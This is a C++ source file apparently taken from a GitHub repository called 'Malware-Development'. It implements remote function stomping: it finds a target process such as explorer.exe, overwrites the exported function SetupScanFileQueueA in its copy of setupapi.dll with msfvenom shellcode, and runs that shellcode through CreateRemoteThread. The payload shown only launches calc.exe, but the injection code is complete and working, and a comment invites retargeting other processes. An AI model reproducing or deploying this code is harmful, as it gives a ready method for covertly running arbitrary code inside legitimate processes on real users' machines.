Malware-Development/RemoteFunctionStomping.cpp at main · ThanniKudam/Malware-Development · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
#include <Windows.h>
#include <stdio.h>
#include <TlHelp32.h>
//Replace explorer.exe with whatever process you want to target
#define TargetProc L"explorer.exe"

DWORD getPID() {

	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hSnapshot == INVALID_HANDLE_VALUE) {
		printf("[!] Failed to take snapshot. Exiting with error: %ld\n", GetLastError());
		return EXIT_FAILURE;
	}
	printf("[+] Snapshot taken successfully.\n");

	PROCESSENTRY32 pe32 = { 0 };
	pe32.dwSize = sizeof(PROCESSENTRY32);

	if (Process32First(hSnapshot, &pe32) == TRUE) {
		while (Process32Next(hSnapshot, &pe32) == TRUE) {
			if (_wcsicmp(pe32.szExeFile, TargetProc) == 0) {
				return pe32.th32ProcessID;
				break;
			}
		}
	}
}

int main() {

	DWORD PID = getPID();
	printf("[+] Process ID of target process [%ws] is %ld\n", TargetProc, PID);
//calc.exe shellcode generated using msfvenom
	unsigned char shellcode[] =
		"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
		"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
		"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
		"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
		"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
		"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
		"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
		"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
		"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
		"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
		"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
		"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
		"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
		"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
		"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
		"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
		"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
		"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
		"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
		"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

	DWORD oldprotect = NULL;
	DWORD TID = NULL;
//Our sacrificial DLL
	HMODULE hModule = LoadLibraryA("setupapi.dll");
	if (hModule == NULL) {
		printf("[!] Failed to load [setupapi.dll]. Exiting with error: %ld\n", GetLastError());
		return EXIT_FAILURE;
	}
	printf("[+] Loaded [setupapi.dll] at\n\t\\----0x%p\n", hModule);
//Target function()
	PVOID pAddress = GetProcAddress(hModule, "SetupScanFileQueueA");
	if (pAddress == NULL) {
		printf("[!] Failed to get the address of the target function [SetupScanFileQueueA]. Exiting with error: %ld\n", GetLastError());
		return EXIT_FAILURE;
	}
	printf("[+] Got the address of the target function [SetupScanFileQueueA]\n\t\\----0x%p\n", pAddress);

	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
	if (hProcess == NULL) {
		printf("[!] Failed to get an handle to the target process [explorer.exe]. Exiting with error: %ld\n", GetLastError());
		return EXIT_FAILURE;
	}
	printf("[+] Got an handle to the target process [explorer.exe].\n");

	if (!VirtualProtectEx(hProcess, pAddress, sizeof(shellcode), PAGE_READWRITE, &oldprotect)) {
		printf("[!] Failed to change the memory protection of target func address.\n[!] Can't write the shellcode into memory.\n[!] Exiting with error: %ld\n", GetLastError());
		return EXIT_FAILURE;
	}
	printf("[+] Changed the memory protection to PAGE_READWRITE.\n");

	Sleep(480);

	printf("[*] Attempting to write shellcode into target func address.\n");

	if (!WriteProcessMemory(hProcess, pAddress, shellcode, sizeof(shellcode), NULL)) {
		printf("[!] Failed to write shellcode into target address. Exiting with error: %ld\n", GetLastError());
		return EXIT_FAILURE;
	}
	printf("[+] Shellcode written into target address\n\t\\----0x%p\n", pAddress);

	if (!VirtualProtectEx(hProcess, pAddress, sizeof(shellcode), PAGE_EXECUTE_READWRITE, &oldprotect)) {
		printf("[!] Failed to change the memory protection to executable.\n[!] Exiting with error: %ld\n", GetLastError());
		return EXIT_FAILURE;
	}
	printf("[+] Changed the memory protection to PAGE_EXECUTE_READWRITE.\n");

	HANDLE hThread = CreateRemoteThread(hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)pAddress, NULL, 0, &TID);
	if (hThread == NULL) {
		printf("[!] Failed to create remote thread for shellcode execution. Exiting with error: %ld\n", GetLastError());
		return EXIT_FAILURE;
	}
	printf("[+] Thread created for execution. TID: %ld\n", TID);

	WaitForSingleObject(hThread, INFINITE);

	printf("[+] Shellcode executed successfully.\n");

	Sleep(480);

	printf("[*] Cleaning up...\n");

	CloseHandle(hProcess);
	CloseHandle(hThread);

	return EXIT_SUCCESS;
}